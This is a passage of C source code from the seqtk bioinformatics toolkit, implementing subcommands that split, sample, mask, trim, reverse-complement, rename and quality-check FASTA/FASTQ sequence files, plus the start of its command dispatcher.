seq->name.s); if (k != kh_end(h)) { p = &kh_val(h, k); for (i = 0; i < p->n; ++i) { int beg = p->a[i]>>32; if (beg < seq->seq.l) seq->seq.s[beg] = (int)p->a[i]; } } printf(">%s", seq->name.s); for (i = 0; i < l; ++i) { if (i%60 == 0) putchar('\n'); putchar(seq->seq.s[i]); } putchar('\n'); } // free kseq_destroy(seq); gzclose(fp); for (k = 0; k < kh_end(h); ++k) { if (kh_exist(h, k)) { free(kh_val(h, k).a); free((char*)kh_key(h, k)); } } kh_destroy(reg, h); return 0; } int stk_listhet(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int i, l; if (argc == 1) { fprintf(stderr, "Usage: seqtk listhet <in.fa>\n"); return 1; } fp = (strcmp(argv[1], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[1], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { for (i = 0; i < l; ++i) { int b = seq->seq.s[i]; if (bitcnt_table[seq_nt16_table[b]] == 2) printf("%s\t%d\t%c\n", seq->name.s, i+1, b); } } kseq_destroy(seq); gzclose(fp); return 0; } int stk_split(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int c, i, l, n = 10, len = 0; char *prefix, *fn; FILE **out; while ((c = getopt(argc, argv, "n:l:")) >= 0) { if (c == 'n') n = atoi(optarg); else if (c == 'l') len = atoi(optarg); } if (argc == optind) { fprintf(stderr, "Usage: seqtk split [options] <prefix> <in.fa>\n"); fprintf(stderr, "Options:\n"); fprintf(stderr, " -n INT number of files [%d]\n", n); fprintf(stderr, " -l INT line length [%d]\n", len); return 1; } prefix = argv[optind]; fp = (strcmp(argv[optind+1], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind+1], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } out = (FILE**)malloc(sizeof(FILE*) * n); fn = (char*)malloc(strlen(prefix) + 10); for (i = 0; i < n; ++i) { sprintf(fn, "%s.%.5d.fa", prefix, i + 1); out[i] = fopen(fn, "w+"); if (out[i] == 0) { fprintf(stderr, "ERROR: failed to create file %s\n", fn); exit(1); } } free(fn); seq = kseq_init(fp); i = 0; while ((l = kseq_read(seq)) >= 0) { stk_printseq(out[i % n], seq, len); ++i; } for (i = 0; i < n; ++i) fclose(out[i]); free(out); kseq_destroy(seq); gzclose(fp); return 0; } /* cutN */ static int cutN_min_N_tract = 1000; static int cutN_nonN_penalty = 10; static int find_next_cut(const kseq_t *ks, int k, int *begin, int *end) { int i, b, e; while (k < ks->seq.l) { if (seq_nt16_table[(int)ks->seq.s[k]] == 15) { int score, max; score = 0; e = max = -1; for (i = k; i < ks->seq.l && score >= 0; ++i) { /* forward */ if (seq_nt16_table[(int)ks->seq.s[i]] == 15) ++score; else score -= cutN_nonN_penalty; if (score > max) max = score, e = i; } score = 0; b = max = -1; for (i = e; i >= 0 && score >= 0; --i) { /* backward */ if (seq_nt16_table[(int)ks->seq.s[i]] == 15) ++score; else score -= cutN_nonN_penalty; if (score > max) max = score, b = i; } if (e + 1 - b >= cutN_min_N_tract) { *begin = b; *end = e + 1; return *end; } k = e + 1; } else ++k; } return -1; } static void print_seq(FILE *fpout, const kseq_t *ks, int begin, int end) { int i; if (begin >= end) return; // FIXME: why may this happen? Understand it! fprintf(fpout, "%c%s:%d-%d", ks->qual.l? '@' : '>', ks->name.s, begin+1, end); for (i = begin; i < end && i < ks->seq.l; ++i) { if ((i - begin)%60 == 0) fputc('\n', fpout); fputc(ks->seq.s[i], fpout); } fputc('\n', fpout); if (ks->qual.l == 0) return; fputs("+\n", fpout); for (i = begin; i < end && i < ks->qual.l; ++i) { if ((i - begin)%60 == 0) fputc('\n', fpout); fputc(ks->qual.s[i], fpout); } fputc('\n', fpout); } int stk_cutN(int argc, char *argv[]) { int c, l, gap_only = 0; gzFile fp; kseq_t *ks; while ((c = getopt(argc, argv, "n:p:g")) >= 0) { switch (c) { case 'n': cutN_min_N_tract = atoi(optarg); break; case 'p': cutN_nonN_penalty = atoi(optarg); break; case 'g': gap_only = 1; break; default: return 1; } } if (argc == optind) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk cutN [options] <in.fa>\n\n"); fprintf(stderr, "Options: -n INT min size of N tract [%d]\n", cutN_min_N_tract); fprintf(stderr, " -p INT penalty for a non-N [%d]\n", cutN_nonN_penalty); fprintf(stderr, " -g print gaps only, no sequence\n\n"); return 1; } fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = kseq_init(fp); while ((l = kseq_read(ks)) >= 0) { int k = 0, begin = 0, end = 0; while (find_next_cut(ks, k, &begin, &end) >= 0) { if (begin != 0) { if (gap_only) printf("%s\t%d\t%d\n", ks->name.s, begin, end); else print_seq(stdout, ks, k, begin); } k = end; } if (!gap_only) print_seq(stdout, ks, k, l); } kseq_destroy(ks); gzclose(fp); return 0; } int stk_hrun(int argc, char *argv[]) { gzFile fp; kseq_t *ks; int min_len = 7, l = 0, c = 0, beg = 0, i; if (argc == optind) { fprintf(stderr, "Usage: seqtk hrun <in.fa> [minLen=%d]\n", min_len); return 1; } if (argc == optind + 2) min_len = atoi(argv[optind+1]); fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = kseq_init(fp); while (kseq_read(ks) >= 0) { c = ks->seq.s[0]; l = 1; beg = 0; for (i = 1; i < ks->seq.l; ++i) { if (ks->seq.s[i] != c) { if (l >= min_len) printf("%s\t%d\t%d\t%c\n", ks->name.s, beg, beg + l, c); c = ks->seq.s[i]; l = 1; beg = i; } else ++l; } } if (l >= min_len) printf("%s\t%d\t%d\t%c\n", ks->name.s, beg, beg + l, c); kseq_destroy(ks); gzclose(fp); return 0; } /* sample */ static void cpy_kstr(kstring_t *dst, const kstring_t *src) { if (src->l == 0) return; if (src->l + 1 > dst->m) { dst->m = src->l + 1; kroundup32(dst->m); dst->s = realloc(dst->s, dst->m); } dst->l = src->l; memcpy(dst->s, src->s, src->l + 1); } static void cpy_kseq(kseq_t *dst, const kseq_t *src) { cpy_kstr(&dst->name, &src->name); cpy_kstr(&dst->seq, &src->seq); cpy_kstr(&dst->qual, &src->qual); cpy_kstr(&dst->comment, &src->comment); } int stk_sample(int argc, char *argv[]) { int c, twopass = 0; uint64_t i, num = 0, n_seqs = 0; double frac = 0.; gzFile fp; kseq_t *seq; krand_t *kr = 0; while ((c = getopt(argc, argv, "2s:")) >= 0) if (c == 's') kr = kr_srand(atol(optarg)); else if (c == '2') twopass = 1; if (optind + 2 > argc) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk sample [-2] [-s seed=11] <in.fa> <frac>|<number>\n\n"); fprintf(stderr, "Options: -s INT RNG seed [11]\n"); fprintf(stderr, " -2 2-pass mode: twice as slow but with much reduced memory\n\n"); return 1; } frac = atof(argv[optind+1]); if (frac >= 1.0) num = (uint64_t)(frac + .499), frac = 0.; else if (twopass) { fprintf(stderr, "[W::%s] when sampling a fraction, option -2 is ignored.", __func__); twopass = 0; } if (kr == 0) kr = kr_srand(11); if (!twopass) { // the streaming version kseq_t *buf = 0; if (num > 0) buf = calloc(num, sizeof(kseq_t)); if (num > 0 && buf == NULL) { fprintf(stderr, "[E::%s] Could not allocate enough memory for %" PRIu64 " sequences. Exiting...\n", __func__, num); free(kr); return 1; } fp = strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); n_seqs = 0; while (kseq_read(seq) >= 0) { double r = kr_drand(kr); ++n_seqs; if (num) { uint64_t y = n_seqs - 1 < num? n_seqs - 1 : (uint64_t)(r * n_seqs); if (y < num) cpy_kseq(&buf[y], seq); } else if (r < frac) stk_printseq(stdout, seq, UINT_MAX); } for (i = 0; i < num; ++i) { kseq_t *p = &buf[i]; if (p->seq.l) stk_printseq(stdout, p, UINT_MAX); free(p->seq.s); free(p->qual.s); free(p->name.s); } if (buf != NULL) free(buf); } else { uint64_t *buf; khash_t(64) *hash; int absent; if (strcmp(argv[optind], "-") == 0) { fprintf(stderr, "[E::%s] in the 2-pass mode, the input cannot be STDIN.\n", __func__); free(kr); return 1; } // 1st pass buf = malloc(num * 8); for (i = 0; i < num; ++i) buf[i] = UINT64_MAX; fp = gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); n_seqs = 0; while (kseq_read(seq) >= 0) { double r = kr_drand(kr); uint64_t y; ++n_seqs; y = n_seqs - 1 < num? n_seqs - 1 : (uint64_t)(r * n_seqs); if (y < num) buf[y] = n_seqs; } kseq_destroy(seq); gzclose(fp); hash = kh_init(64); for (i = 0; i < num; ++i) kh_put(64, hash, buf[i], &absent); free(buf); // 2nd pass fp = gzopen(argv[optind], "r"); seq = kseq_init(fp); n_seqs = 0; while (kseq_read(seq) >= 0) if (kh_get(64, hash, ++n_seqs) != kh_end(hash)) stk_printseq(stdout, seq, UINT_MAX); kh_destroy(64, hash); } kseq_destroy(seq); gzclose(fp); free(kr); return 0; } /* seq */ void stk_mask(kseq_t *seq, const khash_t(reg) *h, int is_complement, int mask_chr) { unsigned i, j; khiter_t k; k = kh_get(reg, h, seq->name.s); if (k == kh_end(h)) { // not found in the hash table if (is_complement) { if (mask_chr) { for (j = 0; j < seq->seq.l; ++j) seq->seq.s[j] = mask_chr; } else { for (j = 0; j < seq->seq.l; ++j) seq->seq.s[j] = tolower(seq->seq.s[j]); } } } else { reglist_t *p = &kh_val(h, k); if (!is_complement) { for (i = 0; i < p->n; ++i) { unsigned beg = p->a[i]>>32, end = p->a[i]; if (beg >= seq->seq.l) continue; if (end > seq->seq.l) end = seq->seq.l; if (!mask_chr) for (j = beg; j < end; ++j) seq->seq.s[j] = tolower(seq->seq.s[j]); else for (j = beg; j < end; ++j) seq->seq.s[j] = mask_chr; } } else { int8_t *mask = calloc(seq->seq.l, 1); for (i = 0; i < p->n; ++i) { unsigned beg = p->a[i]>>32, end = p->a[i]; if (end >= seq->seq.l) end = seq->seq.l; for (j = beg; j < end; ++j) mask[j] = 1; } if (mask_chr) { for (j = 0; j < seq->seq.l; ++j) if (mask[j] == 0) seq->seq.s[j] = mask_chr; } else { for (j = 0; j < seq->seq.l; ++j) if (mask[j] == 0) seq->seq.s[j] = tolower(seq->seq.s[j]); } free(mask); } } } int stk_seq(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int c, qual_thres = 0, flag = 0, qual_shift = 33, mask_chr = 0, min_len = 0, max_q = 255, fake_qual = -1; unsigned i, line_len = 0; int64_t n_seqs = 0; double frac = 1.; khash_t(reg) *h = 0; krand_t *kr = 0; while ((c = getopt(argc, argv, "N12q:l:Q:aACrn:s:f:M:L:cVUX:SF:")) >= 0) { switch (c) { case 'a': case 'A': flag |= 1; break; case 'C': flag |= 2; break; case 'r': flag |= 4; break; case 'c': flag |= 8; break; case '1': flag |= 16; break; case '2': flag |= 32; break; case 'V': flag |= 64; break; case 'N': flag |= 128; break; case 'U': flag |= 256; break; case 'S': flag |= 512; break; case 'M': h = stk_reg_read(optarg); break; case 'n': mask_chr = *optarg; break; case 'Q': qual_shift = atoi(optarg); break; case 'q': qual_thres = atoi(optarg); break; case 'X': max_q = atoi(optarg); break; case 'l': line_len = atoi(optarg); break; case 'L': min_len = atoi(optarg); break; case 's': kr = kr_srand(atol(optarg)); break; case 'f': frac = atof(optarg); break; case 'F': fake_qual = *optarg; break; } } if (kr == 0) kr = kr_srand(11); if (argc == optind && isatty(fileno(stdin))) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk seq [options] <in.fq>|<in.fa>\n\n"); fprintf(stderr, "Options: -q INT mask bases with quality lower than INT [0]\n"); fprintf(stderr, " -X INT mask bases with quality higher than INT [255]\n"); fprintf(stderr, " -n CHAR masked bases converted to CHAR; 0 for lowercase [0]\n"); fprintf(stderr, " -l INT number of residues per line; 0 for 2^32-1 [%d]\n", line_len); fprintf(stderr, " -Q INT quality shift: ASCII-INT gives base quality [%d]\n", qual_shift); fprintf(stderr, " -s INT random seed (effective with -f) [11]\n"); fprintf(stderr, " -f FLOAT sample FLOAT fraction of sequences [1]\n"); fprintf(stderr, " -M FILE mask regions in BED or name list FILE [null]\n"); fprintf(stderr, " -L INT drop sequences with length shorter than INT [0]\n"); fprintf(stderr, " -F CHAR fake FASTQ quality []\n"); fprintf(stderr, " -c mask complement region (effective with -M)\n"); fprintf(stderr, " -r reverse complement\n"); fprintf(stderr, " -A force FASTA output (discard quality)\n"); fprintf(stderr, " -C drop comments at the header lines\n"); fprintf(stderr, " -N drop sequences containing ambiguous bases\n"); fprintf(stderr, " -1 output the 2n-1 reads only\n"); fprintf(stderr, " -2 output the 2n reads only\n"); fprintf(stderr, " -V shift quality by '(-Q) - 33'\n"); fprintf(stderr, " -U convert all bases to uppercases\n"); fprintf(stderr, " -S strip of white spaces in sequences\n"); fprintf(stderr, "\n"); free(kr); return 1; } if (line_len == 0) line_len = UINT_MAX; fp = optind < argc && strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); qual_thres += qual_shift; while (kseq_read(seq) >= 0) { ++n_seqs; if (seq->seq.l < min_len) continue; // NB: length filter before taking random if (frac < 1. && kr_drand(kr) >= frac) continue; if (flag & 48) { // then choose odd/even reads only if ((flag&16) && (n_seqs&1) == 0) continue; if ((flag&32) && (n_seqs&1) == 1) continue; } if (flag & 512) { // option -S: squeeze out white spaces int k; if (seq->qual.l) { for (i = k = 0; i < seq->seq.l; ++i) if (!isspace(seq->seq.s[i])) seq->qual.s[k++] = seq->qual.s[i]; seq->qual.l = k; } for (i = k = 0; i < seq->seq.l; ++i) if (!isspace(seq->seq.s[i])) seq->seq.s[k++] = seq->seq.s[i]; seq->seq.l = k; } if (seq->qual.l && qual_thres > qual_shift) { if (mask_chr) { for (i = 0; i < seq->seq.l; ++i) if (seq->qual.s[i] < qual_thres || seq->qual.s[i] > max_q) seq->seq.s[i] = mask_chr; } else { for (i = 0; i < seq->seq.l; ++i) if (seq->qual.s[i] < qual_thres || seq->qual.s[i] > max_q) seq->seq.s[i] = tolower(seq->seq.s[i]); } } if (flag & 256) // option -U: convert to uppercases for (i = 0; i < seq->seq.l; ++i) seq->seq.s[i] = toupper(seq->seq.s[i]); if (flag & 1) seq->qual.l = 0; // option -a: fastq -> fasta else if (fake_qual >= 33 && fake_qual <= 127) { if (seq->qual.m < seq->seq.m) { seq->qual.m = seq->seq.m; seq->qual.s = (char*)realloc(seq->qual.s, seq->qual.m); } seq->qual.l = seq->seq.l; memset(seq->qual.s, fake_qual, seq->qual.l); seq->qual.s[seq->qual.l] = 0; } if (flag & 2) seq->comment.l = 0; // option -C: drop fasta/q comments if (h) stk_mask(seq, h, flag&8, mask_chr); // masking if (flag & 4) { // option -r: reverse complement int c0, c1; for (i = 0; i < seq->seq.l>>1; ++i) { // reverse complement sequence c0 = comp_tab[(int)seq->seq.s[i]]; c1 = comp_tab[(int)seq->seq.s[seq->seq.l - 1 - i]]; seq->seq.s[i] = c1; seq->seq.s[seq->seq.l - 1 - i] = c0; } if (seq->seq.l & 1) // complement the remaining base seq->seq.s[seq->seq.l>>1] = comp_tab[(int)seq->seq.s[seq->seq.l>>1]]; if (seq->qual.l) { for (i = 0; i < seq->seq.l>>1; ++i) // reverse quality c0 = seq->qual.s[i], seq->qual.s[i] = seq->qual.s[seq->qual.l - 1 - i], seq->qual.s[seq->qual.l - 1 - i] = c0; } } if ((flag & 64) && seq->qual.l && qual_shift != 33) for (i = 0; i < seq->qual.l; ++i) seq->qual.s[i] -= qual_shift - 33; if (flag & 128) { // option -N: drop sequences containing ambiguous bases - Note: this is the last step! for (i = 0; i < seq->seq.l; ++i) if (seq_nt16to4_table[seq_nt16_table[(int)seq->seq.s[i]]] > 3) break; if (i < seq->seq.l) continue; } stk_printseq(stdout, seq, line_len); } kseq_destroy(seq); gzclose(fp); stk_reg_destroy(h); free(kr); return 0; } int stk_gc(int argc, char *argv[]) { int c, is_at = 0, min_l = 20; double frac = 0.6f, xdropoff = 10.0f, q; gzFile fp; kseq_t *seq; while ((c = getopt(argc, argv, "wx:f:l:")) >= 0) { if (c == 'x') xdropoff = atof(optarg); else if (c == 'w') is_at = 1; else if (c == 'f') frac = atof(optarg); else if (c == 'l') min_l = atoi(optarg); } if (optind + 1 > argc) { fprintf(stderr, "Usage: seqtk gc [options] <in.fa>\n"); fprintf(stderr, "Options:\n"); fprintf(stderr, " -w identify high-AT regions\n"); fprintf(stderr, " -f FLOAT min GC fraction (or AT fraction for -w) [%.2f]\n", frac); fprintf(stderr, " -l INT min region length to output [%d]\n", min_l); fprintf(stderr, " -x FLOAT X-dropoff [%.1f]\n", xdropoff); return 1; } q = (1.0f - frac) / frac; fp = strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while (kseq_read(seq) >= 0) { int i, start = 0, max_i = 0, n_hits = 0, start_hits = 0, max_hits = 0; double sc = 0., max = 0.; for (i = 0; i < seq->seq.l; ++i) { int hit; c = seq_nt16_table[(int)seq->seq.s[i]]; if (is_at) hit = (c == 1 || c == 8 || c == 9); else hit = (c == 2 || c == 4 || c == 6); n_hits += hit; if (hit) { if (sc == 0) start = i, start_hits = n_hits; sc += q; if (sc > max) max = sc, max_i = i, max_hits = n_hits; } else if (sc > 0) { sc += -1.0f; if (sc < 0 || max - sc > xdropoff) { if (max_i + 1 - start >= min_l) printf("%s\t%d\t%d\t%d\n", seq->name.s, start, max_i + 1, max_hits - start_hits + 1); sc = max = 0; i = max_i; } } } if (max > 0. && max_i + 1 - start >= min_l) printf("%s\t%d\t%d\t%d\n", seq->name.s, start, max_i + 1, max_hits - start_hits + 1); } kseq_destroy(seq); gzclose(fp); return 0; } int stk_mergepe(int argc, char *argv[]) { gzFile fp1, fp2; kseq_t *seq[2]; if (argc < 3) { fprintf(stderr, "Usage: seqtk mergepe <in1.fq> <in2.fq>\n"); return 1; } fp1 = strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); fp2 = strcmp(argv[2], "-")? gzopen(argv[2], "r") : gzdopen(fileno(stdin), "r"); if (fp1 == 0 || fp2 == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq[0] = kseq_init(fp1); seq[1] = kseq_init(fp2); while (kseq_read(seq[0]) >= 0) { if (kseq_read(seq[1]) < 0) { fprintf(stderr, "[W::%s] the 2nd file has fewer records.\n", __func__); break; } stk_printseq(stdout, seq[0], 0); stk_printseq(stdout, seq[1], 0); } if (kseq_read(seq[1]) >= 0) fprintf(stderr, "[W::%s] the 1st file has fewer records.\n", __func__); kseq_destroy(seq[0]); gzclose(fp1); kseq_destroy(seq[1]); gzclose(fp2); return 0; } int stk_dropse(int argc, char *argv[]) { gzFile fp; kseq_t *seq, last; if (argc == 1 && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk dropse <in.fq>\n"); return 1; } fp = argc > 1 && strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); memset(&last, 0, sizeof(kseq_t)); while (kseq_read(seq) >= 0) { if (last.name.l) { kstring_t *p = &last.name, *q = &seq->name; int is_diff; if (p->l == q->l) { int l = (p->l > 2 && p->s[p->l-2] == '/' && q->s[q->l-2] == '/' && isdigit(p->s[p->l-1]) && isdigit(q->s[q->l-1]))? p->l - 2 : p->l; is_diff = strncmp(p->s, q->s, l); } else is_diff = 1; if (!is_diff) { stk_printseq(stdout, &last, 0); stk_printseq(stdout, seq, 0); last.name.l = 0; } else cpy_kseq(&last, seq); } else cpy_kseq(&last, seq); } kseq_destroy(seq); gzclose(fp); // free last! return 0; } static inline int kputc(int c, kstring_t *s) { if (s->l + 1 >= s->m) { char *tmp; s->m = s->l + 2; kroundup32(s->m); if ((tmp = (char*)realloc(s->s, s->m))) s->s = tmp; else return EOF; } s->s[s->l++] = c; s->s[s->l] = 0; return c; } int stk_hpc(int argc, char *argv[]) { gzFile fp; kseq_t *seq; kstring_t str = {0,0,0}; if (argc == 1 && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk hpc <in.fq>\n"); return 1; } fp = argc > 1 && strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while (kseq_read(seq) >= 0) { int i, last; str.l = 0; if (seq->seq.l == 0) continue; for (i = 1, last = 0; i <= seq->seq.l; ++i) { if (i == seq->seq.l || seq->seq.s[last] != seq->seq.s[i]) { kputc(seq->seq.s[last], &str); last = i; } } putchar('>'); puts(seq->name.s); puts(str.s); } kseq_destroy(seq); gzclose(fp); free(str.s); return 0; } int stk_rename(int argc, char *argv[]) { gzFile fp; kseq_t *seq, last; char *prefix = 0; uint64_t n = 1; if (argc == 1 && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk rename <in.fq> [prefix]\n"); return 1; } fp = argc > 1 && strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); if (argc > 2) prefix = argv[2]; memset(&last, 0, sizeof(kseq_t)); while (kseq_read(seq) >= 0) { if (last.name.l) { kstring_t *p = &last.name, *q = &seq->name; int is_diff; if (p->l == q->l) { int l = (p->l > 2 && p->s[p->l-2] == '/' && q->s[q->l-2] == '/' && isdigit(p->s[p->l-1]) && isdigit(q->s[q->l-1]))? p->l - 2 : p->l; is_diff = strncmp(p->s, q->s, l); } else is_diff = 1; if (!is_diff) { stk_printseq_renamed(stdout, &last, 0, prefix, n); stk_printseq_renamed(stdout, seq, 0, prefix, n); last.name.l = 0; ++n; } else { stk_printseq_renamed(stdout, &last, 0, prefix, n); ++n; cpy_kseq(&last, seq); } } else cpy_kseq(&last, seq); } if (last.name.l) stk_printseq_renamed(stdout, &last, 0, prefix, n); kseq_destroy(seq); gzclose(fp); // free last! return 0; } int stk_kfreq(int argc, char *argv[]) { gzFile fp; kseq_t *ks; int kmer, i, l, mask; char *nei; if (argc < 2) { fprintf(stderr, "Usage: seqtk kfreq <kmer> <in.fa>\n"); return 1; } // get the k-mer l = strlen(argv[1]); for (i = kmer = 0; i < l; ++i) { int c = seq_nt6_table[(int)argv[1][i]]; assert(c >= 1 && c <= 4); kmer = kmer << 2 | (c - 1); } mask = (1<<2*l) - 1; // get the neighbors nei = calloc(1, 1<<2*l); for (i = 0; i < l; ++i) { int j, x; x = kmer & ~(3 << 2*i); for (j = 0; j < 4; ++j) nei[x|j<<2*i] = 1; } fp = argc == 2 || strcmp(argv[2], "-") == 0? gzdopen(fileno(stdin), "r") : gzopen(argv[2], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = kseq_init(fp); while (kseq_read(ks) >= 0) { int k, x[2], cnt[2], cnt_nei[2], which; x[0] = x[1] = k = cnt[0] = cnt[1] = cnt_nei[0] = cnt_nei[1] = 0; for (i = 0; i < ks->seq.l; ++i) { int c = seq_nt6_table[(int)ks->seq.s[i]]; if (c >= 1 && c <= 4) { x[0] = (x[0] << 2 | (c - 1)) & mask; x[1] = (x[1] >> 2 | (4 - c) << 2*(l-1)); if (k < l) ++k; if (k == l) { if (x[0] == kmer) ++cnt[0]; else if (x[1] == kmer) ++cnt[1]; if (nei[x[0]]) ++cnt_nei[0]; else if (nei[x[1]]) ++cnt_nei[1]; } } else k = 0; } which = cnt_nei[0] > cnt_nei[1]? 0 : 1; printf("%s\t%ld\t%c\t%d\t%d\n", ks->name.s, ks->seq.l, "+-"[which], cnt_nei[which], cnt[which]); } kseq_destroy(ks); gzclose(fp); return 0; } /* fqchk */ typedef struct { int64_t q[94], b[5]; } posstat_t; static void fqc_aux(posstat_t *p, int pos, int64_t allq[94], double perr[94], int qthres) { int k; int64_t sum = 0, qsum = 0, sum_low = 0; double psum = 0; if (pos <= 0) printf("ALL"); else printf("%d", pos); for (k = 0; k <= 4; ++k) sum += p->b[k]; printf("\t%lld", (long long)sum); for (k = 0; k <= 4; ++k) printf("\t%.1f", 100. * p->b[k] / sum); for (k = 0; k <= 93; ++k) { qsum += p->q[k] * k, psum += p->q[k] * perr[k]; if (k < qthres) sum_low += p->q[k]; } printf("\t%.1f\t%.1f", (double)qsum/sum, -4.343*log((psum+1e-6)/(sum+1e-6))); if (qthres <= 0) { for (k = 0; k <= 93; ++k) if (allq[k] > 0) printf("\t%.2f", 100. * p->q[k] / sum); } else printf("\t%.1f\t%.1f", 100. * sum_low / sum, 100. * (sum - sum_low) / sum); putchar('\n'); } int stk_fqchk(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int i, c, k, max_len = 0, min_len = 0x7fffffff, max_alloc = 0, offset = 33, n_diffQ = 0, qthres = 20; int64_t tot_len = 0, n = 0; double perr[94]; posstat_t all, *pos = 0; while ((c = getopt(argc, argv, "q:")) >= 0) if (c == 'q') qthres = atoi(optarg); if (optind == argc) { fprintf(stderr, "Usage: seqtk fqchk [-q %d] <in.fq>\n", qthres); fprintf(stderr, "Note: use -q0 to get the distribution of all quality values\n"); return 1; } fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); for (k = 0; k <= 93; ++k) perr[k] = pow(10., -.1 * k); perr[0] = perr[1] = perr[2] = perr[3] = .5; while (kseq_read(seq) >= 0) { if (seq->qual.l == 0) continue; ++n; tot_len += seq->seq.l; min_len = min_len < seq->seq.l? min_len : seq->seq.l; max_len = max_len > seq->seq.l? max_len : seq->seq.l; if (max_len > max_alloc) { int old_max = max_alloc; max_alloc = max_len; kroundup32(max_alloc); pos = realloc(pos, max_alloc * sizeof(posstat_t)); memset(&pos[old_max], 0, (max_alloc - old_max) * sizeof(posstat_t)); } for (i = 0; i < seq->qual.l; ++i) { int q = seq->qual.s[i] - offset; int b = seq_nt6_table[(int)seq->seq.s[i]]; b = b? b - 1 : 4; q = q < 93? q : 93; ++pos[i].q[q]; ++pos[i].b[b]; } } kseq_destroy(seq); gzclose(fp); memset(&all, 0, sizeof(posstat_t)); for (i = 0; i < max_len; ++i) { for (k = 0; k <= 93; ++k) all.q[k] += pos[i].q[k]; for (k = 0; k <= 4; ++k) all.b[k] += pos[i].b[k]; } for (k = n_diffQ = 0; k <= 93; ++k) if (all.q[k]) ++n_diffQ; printf("min_len: %d; max_len: %d; avg_len: %.2f; %d distinct quality values\n", min_len, max_len, (double)tot_len/n, n_diffQ); printf("POS\t#bases\t%%A\t%%C\t%%G\t%%T\t%%N\tavgQ\terrQ"); if (qthres <= 0) { for (k = 0; k <= 93; ++k) if (all.q[k] > 0) printf("\t%%Q%d", k); } else printf("\t%%low\t%%high"); putchar('\n'); fqc_aux(&all, 0, all.q, perr, qthres); for (i = 0; i < max_len; ++i) fqc_aux(&pos[i], i + 1, all.q, perr, qthres); free(pos); return 0; } /* main function */ static int usage() { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk <command> <arguments>\n"); fprintf(stderr, "Version: 1.3-r115-dirty\n\n"); fprintf(stderr, "Command: seq common transformation of FASTA/Q\n"); fprintf(stderr, " comp get the nucleotide composition of FASTA/Q\n"); fprintf(stderr, " sample subsample sequences\n"); fprintf(stderr, " subseq extract subsequences from FASTA/Q\n"); fprintf(stderr, " fqchk fastq QC (base/quality summary)\n"); fprintf(stderr, " mergepe interleave two PE FASTA/Q files\n"); fprintf(stderr, " trimfq trim FASTQ using the Phred algorithm\n\n"); fprintf(stderr, " hety regional heterozygosity\n"); fprintf(stderr, " gc identify high- or low-GC regions\n"); fprintf(stderr, " mutfa point mutate FASTA at specified positions\n"); fprintf(stderr, " mergefa merge two FASTA/Q files\n"); fprintf(stderr, " famask apply a X-coded FASTA to a source FASTA\n"); fprintf(stderr, " dropse drop unpaired from interleaved PE FASTA/Q\n"); fprintf(stderr, " rename rename sequence names\n"); fprintf(stderr, " randbase choose a random base from hets\n"); fprintf(stderr, " cutN cut sequence at long N\n"); fprintf(stderr, " gap get the gap locations\n"); fprintf(stderr, " listhet extract the position of each het\n"); fprintf(stderr, " hpc homopolyer-compressed sequence\n"); fprintf(stderr, "\n"); return 1; } int main(int argc, char *argv[]) { if (argc == 1) return usage(); if (strcmp(argv[1], "comp") == 0) return stk_comp(argc-1, argv+1); else if (strcmp(argv[1], "fqchk") == 0) return stk_fqchk(argc-1, argv+1); else if (strcmp(argv[1], "hety") == 0) return stk_hety(argc-1, argv+1); else if (strcmp(argv[1], "gc") == 0) return stk_gc(argc-1, argv+1); else if (strcmp(argv[1], 